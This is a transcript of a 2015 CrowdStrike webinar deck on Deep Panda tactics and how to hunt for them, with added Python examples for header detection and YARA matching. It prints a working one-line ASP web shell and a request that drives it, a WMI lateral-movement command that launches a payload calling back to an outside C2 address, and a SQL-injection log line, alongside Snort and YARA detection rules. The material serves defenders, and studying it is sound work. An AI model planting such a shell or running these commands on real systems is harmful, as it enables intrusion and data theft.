CrowdCasts Monthly: Going Beyond the Indicator

Going Beyond the Indicator

Uploaded by: crowdstrike

Posted on 27-Jan-2015


DESCRIPTION

Learn more about CrowdStrike Services. Request a free consultation on Proactive Response and Incident Response offerings: response.crowdstrike.com/services/

TRANSCRIPT

Page 1: CrowdCasts Monthly: Going Beyond the Indicator

Going Beyond the Indicator

Page 2: CrowdCasts Monthly: Going Beyond the Indicator

Agenda

• Introductions

• Typical Attacker TTPs

• Case Studies

• New Tactics Explained

• Hunting and Detecting

• Best Practice Preparations

• Resources / Q & A

© 2014 CrowdStrike, Inc. All rights reserved. 2

@CROWDSTRIKE | #CROWDCASTS

Page 3: CrowdCasts Monthly: Going Beyond the Indicator

Today’s Speakers

DANNY LUNGSTROM

Prior to CrowdStrike (8+ years): Stroz Friedberg, AT&T, The Aerospace Corporation, CERT/CC

Incident Response, Forensic Analysis, and Risk Assessments

Connect: LinkedIn: Danny Lungstrom

Page 4: CrowdCasts Monthly: Going Beyond the Indicator

Today’s Speakers

JUSTIN J. WEISSERT

Prior to CrowdStrike (7+ years): KPMG LLP (Information Protection and Business Resiliency)

Performing Security Assessments, Auditing and Remediating Environments, and Developing Security Programs/Strategies

Connect: LinkedIn: Justin Weissert | Twitter: @JJWeissert

Page 5: CrowdCasts Monthly: Going Beyond the Indicator

Today’s Speakers

RYAN JAFARKHANI

Prior to CrowdStrike (5+ years): RSA NetWitness, Mandiant, Beckman Coulter

Auditing, Conducting Incident Response Investigations, Network Forensics, Computer Forensics and Malware Analysis

Connect: LinkedIn: Ryan Jafarkhani | Twitter: @rj_jafar

Page 6: CrowdCasts Monthly: Going Beyond the Indicator

WHO IS CROWDSTRIKE?

CrowdStrike is a global provider of security technologies and services focused on identifying advanced threats and targeted attacks. Using big-data technologies, CrowdStrike’s next-generation threat protection platform enables enterprises to identify unknown malware, detect zero-day threats, pinpoint advanced adversaries, and provide attribution.

Page 7: CrowdCasts Monthly: Going Beyond the Indicator

WHAT DO WE DO?

• TECHNOLOGY: Endpoint Threat Detection & Response; Continuous Endpoint Activity Monitoring & Real-Time Forensics

• SERVICES: Proactive & Incident Response Services

• INTELLIGENCE: Cyber Threat Intelligence & Attribution

Page 8: CrowdCasts Monthly: Going Beyond the Indicator

About CrowdStrike Services

• COMPREHENSIVE OFFERINGS

– Incident Response Investigations

– Proactive Threat Assessments

– IR Program Development

• INDUSTRY VETERANS

– Average of Ten Years IR Industry Experience

– Backgrounds in IR Consulting, Government, and Defense

– Specialists in Broad Range of Technologies

• VARIETY OF CUSTOMER VERTICALS

– Finance, Technology, Manufacturing, Retail, Healthcare, Telecommunications, Oil & Gas, Entertainment

(Graphic: WHO = Adversary, WHY = Intent, WHAT = Malware, by Industry)

Page 9: CrowdCasts Monthly: Going Beyond the Indicator

And there are a lot of adversaries

Adversary groups our Intelligence team tracks…

(Map graphic: adversary origins China, Iran, India and Russia plus crime syndicates, each paired with the sectors they target. Sectors shown: Commercial, Government, Non-profit; Financial, Technology, Communications; Defense & Aerospace, Industrial Engineering, NGOs; Financial Sector; Dissident groups; Electronics & Communications; G20, NGOs, Dissident Groups; Energy Companies; Government, Legal, Financial, Media, Telecom; Oil and Gas Companies.)

Page 10: CrowdCasts Monthly: Going Beyond the Indicator

TYPICAL ATTACKER TTPS

Page 11: CrowdCasts Monthly: Going Beyond the Indicator

Typical Attacker TTPs

• Initial Attack Vector

• Malware

– Persistence Mechanism

– Command & Control

– Functionality

• Lateral Movement

• Data Extraction/Theft


Page 12: CrowdCasts Monthly: Going Beyond the Indicator

Shift in Attacker TTPs

Attacker TTP: Historical Trends vs. Current Trends

• Initial Attack Vector

– Historical: Spearphish and Vulnerable External Facing Applications (Most Common)

– Current: No Significant Change

• Malware – Persistence Mechanism

– Historical: Installed as Service, Run Key, Etc.

– Current: No Persistence

• Malware – Command & Control

– Historical: Beacon to Malicious IP or Domain

– Current: No Standard Beacon Activity

• Malware – Functionality

– Historical: Simple – Provides Shell or Basic Upload/Download Functionality

– Current: Robust – Includes All Required Functionality and Commands

• Malware – Location

– Historical: Written to Disk

– Current: Memory-Resident

Page 13: CrowdCasts Monthly: Going Beyond the Indicator

Shift in Attacker TTPs (Cont.)

Attacker TTP: Historical Trends vs. Current Trends

• Lateral Movement

– Historical: Net Use, RDP or Utilities (e.g. PSExec)

– Current: WMI, Service Accounts

• Obfuscation

– Historical: Timestomp Standard Times (Windows API)

– Current: Timestomp Both Standard and File Times (Windows API and MFT)

• Data Extraction

– Historical: Compress Data and Send to Compromised Host Provider

– Current: No Significant Change

• Last Hop Communication

– Historical: Source Country IPs (Most Often Chinese, Russian, Iranian)

– Current: North American IPs, Anonymous VPN Solutions, Cloud

Page 14: CrowdCasts Monthly: Going Beyond the Indicator

Catalyst for Change

• Shifts in Tactics

– Increased Intel Sharing

• Whitepapers

• Blog Posts

• Conference Demos

• VirusTotal

• US Government JIB (Joint Indicator Bulletin)

Pros

• Increased awareness / detection for public companies

• Decreased Intel gap for smaller organizations

• Increased costs for attackers to change TTPs

Cons

• Indicators become less effective as attackers shift TTPs (e.g. new malware, C2 infrastructure)

• Attacks become more advanced to avoid current methods of detection

• Reduces visibility into what attacker is doing and/or targeting

Page 15: CrowdCasts Monthly: Going Beyond the Indicator

CASE STUDIES

Page 16: CrowdCasts Monthly: Going Beyond the Indicator

Case Studies - Background

• Company #1

– Company compromised in 2012 using historical TTPs

– Partial Remediation February 2013

– Re-Compromise March 2013 with new TTPs

• Company #2

– Compromised March 2013

– New TTPs from the Company #1 re-compromise were observed


Page 17: CrowdCasts Monthly: Going Beyond the Indicator

Timeline

(Timeline graphic, February 2013 to April 2013, left to right:)

• Company #1 Investigation Commences (Traditional Tactics)

• Intel Community Shares: TTPs Shared Widely

• Company #1 Partial Remediation (Logging & Monitoring Old Tactics)

• Company #2 Investigation Commences (New Tactics)

• Company #1 Re-compromised (New Tactics)

Page 18: CrowdCasts Monthly: Going Beyond the Indicator

NEW TACTICS EXPLAINED

Page 19: CrowdCasts Monthly: Going Beyond the Indicator

Deep Panda – Simple Web Shell

• 28-byte web shell

• Active Server Page file

– Expected input is VBScript code (encoded as ASCII hex)

• The execute() function executes any VBScript passed to it

– Upload / download files

– Execute arbitrary commands (including WMI)

– Full access to file system

• Controlled by an attacker “thick client”

The entire web shell:

    <%execute request(chr(42))%>

Page 20: CrowdCasts Monthly: Going Beyond the Indicator

Deep Panda – Simple Web Shell

2014 Crowdstrike, Inc. All rights reserved. 20

As a simple example of an encoded command, the following GET request would cause the backdoor to execute the code Response.Write("<h1>Hello World</h1>"), rendering “Hello World” in the web browser:

    http://<webserver>/showimage.asp?*=%52%65%73%70%6F%6E%73%65%2E%57%72%69%74%65%28%22%3C%68%31%3E%48%65%6C%6C%6F%20%57%6F%72%6C%64%3C%2F%68%31%3E%22%29

Page 21: CrowdCasts Monthly: Going Beyond the Indicator

Deep Panda – Complex Web Shell

• Ability to impersonate a user (with valid credentials)

• Eight different commands

– File system, SQL server, and Active Directory requests

– Upload / download files

– Compile and execute any C# code

Page 22: CrowdCasts Monthly: Going Beyond the Indicator

Web Shell Authentication

• Rudimentary (but effective) authentication for incoming connections

– Requires the presence of a cookie named ‘zWiz’

– or HTTP header Keep-Alive = 320

– or language header containing es-DN (invalid language)

• Prevents identification via search engine indexing or vulnerability scanning


Page 23: CrowdCasts Monthly: Going Beyond the Indicator

Web Shells – But Why?

• Primary foothold back into victim organization

• Less reliant on malware installed on systems, beaconing to a C2

• Why?

– Low to virtually no detection by antivirus products

– The absence of command and control beacon traffic

– Impossible to block known malicious IP addresses to a web server since adversary can easily change their source IP address

– Cookie and HTTP header authentication aware web shells avoid being enumerated by search engines and restrict access, further reducing their network footprint

Page 24: CrowdCasts Monthly: Going Beyond the Indicator

Second Stage Malware

(Diagram: Adversary, via Anonymous VPN or Proxy, accesses the Web Shell on the Web Server, uploads malware, then uses the Web Shell for execution, Lateral Movement and Data theft; C2 Infrastructure sits behind the web server.)

Why?

– No Command and Control Beacon activity

– Change IP/Domain on the fly

– Runs in memory

– Limits forensic artifacts

Page 25: CrowdCasts Monthly: Going Beyond the Indicator

Lateral Movement

(Diagram: Adversary, via Anonymous VPN or Proxy, accesses the Web Shell on the Web Server, leverages WMI to reach Host 2, which connects out to C2 Infrastructure at 59.111.22.222.)

Command run on the Web Server:

    System32\cmd.exe - c:\bad.exe /f wmi /s Host2 /u Host2\Administrator /p "P@ssW0rd" /m call /q "Win32_Process" /c Create – CommandLine:C:\bad.exe /f sh /s 59.111.22.222 /p 443"

Custom VB script “PsExec” Utility

– 4kb script to remotely launch process as a specified user

– Run via Cscript.exe with arguments: Username, Password, Remote Host, Process path

Why WMI?

– Evades most typical logging

– Shows up as WMI Service

– Powerful functionality, built into Windows

Page 26: CrowdCasts Monthly: Going Beyond the Indicator

HUNTING AND DETECTING

Page 27: CrowdCasts Monthly: Going Beyond the Indicator

Go Beyond the Indicator

• New evil requires new approaches for detection

• Look through multiple haystacks for a single needle

– The evil stands out with the right methodology

• Blog series

– Mo’ Shells Mo’ Problems


http://www.crowdstrike.com/blog/

Page 28: CrowdCasts Monthly: Going Beyond the Indicator

Hunting – WMI Activity


• Windows XP and Server 2003 Had Limited Logging

– %systemroot%\system32\wbem\logs

• Windows 7 and Server 2008 Do NOT Log

– Help investigators help you – enable ahead of time!

– wevtutil.exe sl Microsoft-Windows-WMI-Activity/Trace /e:true

– Review WMITracing.log via Event Viewer

• Be Familiar with Your Environment’s Use of WMI

Page 29: CrowdCasts Monthly: Going Beyond the Indicator

Hunting Web Shells – Identifying Intrusion Points

• Web shells are often one of the earliest stages of malware

• Search for activity on the system near the first known compromise time

– Successful web scans in logs

– SQL injection

– Dropper malware

– Lateral movement from other compromised systems

– Pages created or modified within the webserver document root


2013-08-25 13:03:53 GET item-details.aspx id=1%27%20or%201=@@version-- - 80 - <redacted IP>

Page 30: CrowdCasts Monthly: Going Beyond the Indicator

Hunting Web Shells – File Stacking

• File stacking is based on the concept of least frequency of occurrence

• Collect files from all of your webservers and investigate outliers

– What files do not exist on other web servers?

– PHP|JSP|ASP|ASPX|CFM


Page 31: CrowdCasts Monthly: Going Beyond the Indicator

Hunting Web Shells – Web Log Review

• Perform statistical analysis of page requests and search for outliers

– See exactly when the web shells were in use via the web logs


Page 32: CrowdCasts Monthly: Going Beyond the Indicator

Hunting Web Shells – Network Monitoring

• Stack Web Requests from Network Data

• Leverage Cyber Intelligence Feeds to Detect Known Web Shells

– Unique header attributes

– HTML used to produce the shell


alert tcp $EXTERNAL_NET any -> $WEB_SERVERS $HTTP_PORTS (
    msg: "CrowdStrike Deep Panda CSharp Webshell Headers";
    content: "Keep-Alive: 320"; http_raw_header;
    content: "es-DN"; http_raw_header;
    flow: established, to_server;
    classtype: trojan-activity;
    metadata: service http;
    sid: xxx; rev: xxx;
)
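The web shell authentication slide lists three markers the C# shell checks (the zWiz cookie, Keep-Alive equal to 320, or an Accept-Language containing es-DN), while the Snort rule above only fires when both header strings are present. The following Python is an added example (not CrowdStrike code) that checks all three markers on captured HTTP requests and also mirrors the rule's two-content condition, so the gap between the two is visible; the sample requests are constructed.

```python
"""Flagging the Deep Panda C# web shell's header-based 'authentication'.
Added example, not CrowdStrike code; the sample requests are constructed.
Markers from the deck: a cookie named zWiz, Keep-Alive equal to 320, or an
Accept-Language containing the invalid tag es-DN. Any one marker is a hunt
lead; the deck's Snort rule needs both raw-header strings at once."""

def split_request(raw):
    """Return (request_line, header_block_text) of a raw HTTP request."""
    text = raw.decode("latin-1") if isinstance(raw, bytes) else raw
    head = text.replace("\r\n", "\n").split("\n\n", 1)[0]
    first, _, rest = head.partition("\n")
    return first, rest

def parse_headers(header_text):
    """Header block -> {lower_name: value}; duplicate names keep the last value."""
    headers = {}
    for line in header_text.split("\n"):
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers

def webshell_auth_markers(raw):
    """Names of the shell's auth markers present in the request (empty = none)."""
    _, header_text = split_request(raw)
    h = parse_headers(header_text)
    found = []
    cookie_names = {c.split("=", 1)[0].strip()
                    for c in h.get("cookie", "").split(";") if c.strip()}
    if "zWiz" in cookie_names:
        found.append("cookie:zWiz")
    if h.get("keep-alive") == "320":
        found.append("keep-alive:320")
    if "es-dn" in h.get("accept-language", "").lower():
        found.append("accept-language:es-DN")
    return found

def snort_rule_would_fire(raw):
    """Mirror the deck's rule: both contents must occur in the raw headers."""
    _, header_text = split_request(raw)
    return "Keep-Alive: 320" in header_text and "es-DN" in header_text

# Constructed samples: full marker set, cookie-only, and a benign request
SHELL_REQUEST = ("POST /images/default.aspx HTTP/1.1\r\nHost: www.example.test\r\n"
                 "Keep-Alive: 320\r\nAccept-Language: es-DN,en;q=0.5\r\n"
                 "Cookie: zWiz=1; ASP.NET_SessionId=abc\r\nContent-Length: 0\r\n\r\n")
COOKIE_ONLY_REQUEST = ("POST /images/default.aspx HTTP/1.1\r\nHost: www.example.test\r\n"
                       "Cookie: zWiz=1\r\nContent-Length: 0\r\n\r\n")
NORMAL_REQUEST = ("GET /default.aspx HTTP/1.1\r\nHost: www.example.test\r\n"
                  "Accept-Language: en-US,en;q=0.8\r\nKeep-Alive: 300\r\n\r\n")

if __name__ == "__main__":
    for name, req in [("shell", SHELL_REQUEST), ("cookie-only", COOKIE_ONLY_REQUEST),
                      ("normal", NORMAL_REQUEST)]:
        print(name, webshell_auth_markers(req), "snort:", snort_rule_would_fire(req))
```

The cookie-only request shows why the Snort rule alone is not sufficient coverage: a shell client that authenticates with the zWiz cookie never sends the two header strings the rule requires.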

Page 33: CrowdCasts Monthly: Going Beyond the Indicator

Hunting – Memory Resident Malware


• “Fileless” Forensics Fun

• Persistence, We Don’t Need No Stinkin’ Persistence

• New Approach to Malware Means New Approach to Forensics

• Hidden, Not Invisible

• What’s Normal and What’s New?

– Get to know your systems

– Image memory, review, rinse and repeat

Page 34: CrowdCasts Monthly: Going Beyond the Indicator

Hunting with YARA

• YARA signatures can be used to search your enterprise for specific patterns on disk and in memory


rule CrowdStrike_13091_01 : deep_panda alice RAT
{
    meta:
        description = "Detection of Mad Hatter .NET RAT"
        last_modified = "2013-10-08"
        version = "1.1"
        in_the_wild = true
        copyright = "CrowdStrike, Inc"
        report = "CSIT-13091"
    strings:
        $marker1 = "alice'srabbithole" wide
        $marker2 = "{{\"Version\":{0},\"HostName\":\"{1}\",\"osVersion\":\"{2}\",\"tm\":\"{3}\",\"tz\":{4}}}" wide
        $marker3 = "InstManager.pdb"
        $marker4 = "<osVersion>"
        $marker5 = "<tm>"
        $marker6 = "<tz>"
    condition:
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and 2 of ($marker*)
}
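To make the rule's condition readable step by step, the following Python is an added example (not CrowdStrike code, and not using the yara library) that re-implements its three tests: the MZ check, the e_lfanew lookup to the PE signature, and the "2 of" marker count with wide strings searched as UTF-16LE. The buffer it runs on is constructed, not a real sample.

```python
"""What the YARA rule on this slide tests, re-implemented in plain Python so
each part of the condition can be read on its own. Added example, not
CrowdStrike code, and it does not use the yara library; the sample buffer is
constructed, not malware.
  uint16(0) == 0x5A4D             file starts with the DOS 'MZ' signature
  uint32(uint32(0x3C)) == 0x4550  e_lfanew (dword at 0x3C) points at 'PE\\0\\0'
  2 of ($marker*)                 at least two markers present; 'wide' ones
                                  are searched as UTF-16LE, the rest as ASCII"""
import struct

# (text, wide) exactly as in the rule; YARA's \" escapes become plain quotes
MARKERS = [
    ("alice'srabbithole", True),
    ('{{"Version":{0},"HostName":"{1}","osVersion":"{2}","tm":"{3}","tz":{4}}}', True),
    ("InstManager.pdb", False),
    ("<osVersion>", False),
    ("<tm>", False),
    ("<tz>", False),
]

def encode_marker(text, wide):
    return text.encode("utf-16-le") if wide else text.encode("ascii")

def is_pe(data):
    """uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550."""
    if len(data) < 0x40 or struct.unpack_from("<H", data, 0)[0] != 0x5A4D:
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 4 > len(data):
        return False
    return struct.unpack_from("<I", data, e_lfanew)[0] == 0x00004550

def matched_markers(data):
    return [text for text, wide in MARKERS if encode_marker(text, wide) in data]

def rule_matches(data, minimum=2):
    """True when the file is a PE and at least `minimum` markers are present."""
    return is_pe(data) and len(matched_markers(data)) >= minimum

def build_sample(present, pe=True):
    """Constructed buffer: MZ stub, e_lfanew = 0x80 -> 'PE\\0\\0', then markers."""
    header = bytearray(0x80)
    header[0:2] = b"MZ" if pe else b"ZZ"
    struct.pack_into("<I", header, 0x3C, 0x80)
    body = b"PE\x00\x00" + b"\x00" * 20
    for text, wide in MARKERS:
        if text in present:
            body += encode_marker(text, wide) + b"\x00\x00"
    return bytes(header) + body

if __name__ == "__main__":
    print("two markers:", rule_matches(build_sample({"InstManager.pdb", "<tm>"})))
    print("one marker: ", rule_matches(build_sample({"InstManager.pdb"})))
```

The PE check is what keeps the rule from firing on text files or memory pages that merely contain a marker string, and the same header walk applies when scanning dumped memory regions that start with an MZ header.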

Page 35: CrowdCasts Monthly: Going Beyond the Indicator

CrowdResponse

• Free CrowdStrike Community Tool

• Collect and Analyze Artifacts Across Your Enterprise

• Available Modules

– DirList

– YARA

– PSList

• Many Modules Coming Soon


http://www.crowdstrike.com/community-tools/

Page 36: CrowdCasts Monthly: Going Beyond the Indicator

BEST PRACTICE PREPARATIONS

Page 37: CrowdCasts Monthly: Going Beyond the Indicator

Best Practices

• Proactive Defense of Your Network

– Isolate Critical Assets with Network Segmentation

– Consolidate and Monitor Internet Egress Points

– Implement Centralized Logging

– Patch, Patch, and Patch Again

– Secure Web Applications and Internal Software Projects

– Minimize or Remove Local Admin Privileges

– Implement a Tiered Active Directory Admin Model

– Incorporate Cyber Intelligence Feeds


Page 38: CrowdCasts Monthly: Going Beyond the Indicator

CrowdStrike Can Help!

• Services to Consider

– Tabletop Assessments (Yearly at Least)

•  Keep your team primed and educated on latest attack vectors

– Next-Gen Penetration Testing

• More than just a cursory glance, take a real-world scenario approach

– Incident Response, Disaster Recovery and Business Continuity Plans

• CrowdStrike knowledge and experience can help you improve/build plans

– Incident Response Services Retainer

• Avoid paperwork related time delays

• CrowdStrike Intelligence Subscription

– Stay Up To Date with Latest Attacker TTPs


Page 39: CrowdCasts Monthly: Going Beyond the Indicator

CROWDSTRIKE RESOURCES

Page 40: CrowdCasts Monthly: Going Beyond the Indicator

CrowdStrike Global Threat Report

• Adversary activity analysis and predictions

• Look back at 2013

• Predictive trends for 2014

• Threat actor profiles and TTPs

• Get it on crowdstrike.com


Page 41: CrowdCasts Monthly: Going Beyond the Indicator

CrowdStrike Services

(Graphic: CROWDSTRIKE SERVICES comprises PROACTIVE RESPONSE SERVICES and INCIDENT RESPONSE SERVICES, alongside INTELLIGENCE and TECHNOLOGY.)

Page 42: CrowdCasts Monthly: Going Beyond the Indicator

PROACTIVE RESPONSE SERVICES

– Counter Threat Assessment

– IR Program Development

– Next-Gen Pen Testing

– Tabletop Assessment

– InfoSec Capability Maturity Model

– Adversary Assessments

INCIDENT RESPONSE SERVICES

– Computer Forensic Analysis

– Litigation Support

– Expert Witness Testimony

– Remediation

– Malware Analysis

Page 43: CrowdCasts Monthly: Going Beyond the Indicator

Falcon Intelligence: Threat Intelligence Subscription

1. Government-quality intelligence developed using an ‘all-source model’

2. Detailed technical and strategic analysis of 50+ adversaries’ capabilities, indicators and tradecraft, attribution and intentions

3. Customizable feeds and API for indicators of compromise

4. Indicators can be integrated into current firewall, IDS/IPS, or SIEM solutions to provide real-time attribution

5. Tailored Intelligence feature provides visibility into breaking events that matter to an organization’s brand, infrastructure, and customers

Page 44: CrowdCasts Monthly: Going Beyond the Indicator

Falcon Host: Endpoint Threat Detection & Response

1. Identifies unknown malware & detects zero-day threats

2. Captures and correlates system events to identify adversary activity in real-time

3. Maximum visibility across the full kill chain allows for insight into past & current attacks

4. Context-based detection does not rely on signatures or easily changed IOCs

5. Intelligence integration provides full attribution to identify context, motivation, and actor behind an attack

Page 45: CrowdCasts Monthly: Going Beyond the Indicator

Falcon Host: Continuous Endpoint Activity Monitoring

1. Explore rich execution data collected by the Falcon Host sensors

2. Dashboards provide an at-a-glance view of recent activity for investigative purposes

3. Expert-designed menu of queries provides the ability to proactively hunt for malicious activity

Page 46: CrowdCasts Monthly: Going Beyond the Indicator


Q & A

Page 47: CrowdCasts Monthly: Going Beyond the Indicator

NEXT

Topic: Operationalizing Intelligence

Adam Meyers – Director, Intelligence

Elia Zaitsev – Senior Sales Engineer

April 29th | 2PM ET/11AM PT

Q&A

Page 48: CrowdCasts Monthly: Going Beyond the Indicator